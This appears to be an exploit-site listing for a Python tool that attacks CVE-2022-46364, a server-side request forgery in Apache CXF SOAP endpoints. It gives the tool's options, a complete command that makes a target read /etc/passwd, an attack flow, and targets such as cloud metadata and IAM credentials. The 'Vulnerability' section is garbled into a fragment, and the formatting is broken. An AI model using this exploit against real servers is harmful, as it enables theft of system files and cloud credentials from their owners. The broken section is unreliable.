Share
## https://sploitus.com/exploit?id=37D87439-76C4-560D-9DBC-0BFA2DA08F1D
# CVE-2022-46364 Exploit
Apache CXF SSRF via MTOM XOP:Include | CVSS 9.8 CRITICAL
## Vulnerability
Apache CXF -s -d
```
- `-t, --target` - Vulnerable CXF SOAP endpoint (required)
- `-s, --ssrf-url` - Internal URL to exfiltrate (required)
- `-d, --domain` - Target domain (default: localhost)
- `--plain-soap` - Use plain SOAP instead of MTOM
## Example
```bash
# Read /etc/passwd
python3 exploit.py -t http://target.com:8080/employeeservice -s file:///etc/passwd -d target.com
```
## Attack Flow
1. Attacker sends SOAP request with XOP:Include element
2. CXF server fetches internal URL without validation
3. Response contains Base64-encoded exfiltrated data
4. Exploit decodes and displays content
## Impact
- AWS/GCP/Azure metadata & IAM credentials
- Internal admin panels and APIs
- Database credentials from environment endpoints
- Internal microservice data
## References
- CVE-2022-46364
- CWE-918 (SSRF)
- https://nvd.nist.gov/vuln/detail/CVE-2022-46364
- https://github.com/advisories/GHSA-x3x3-qwjq-8gj4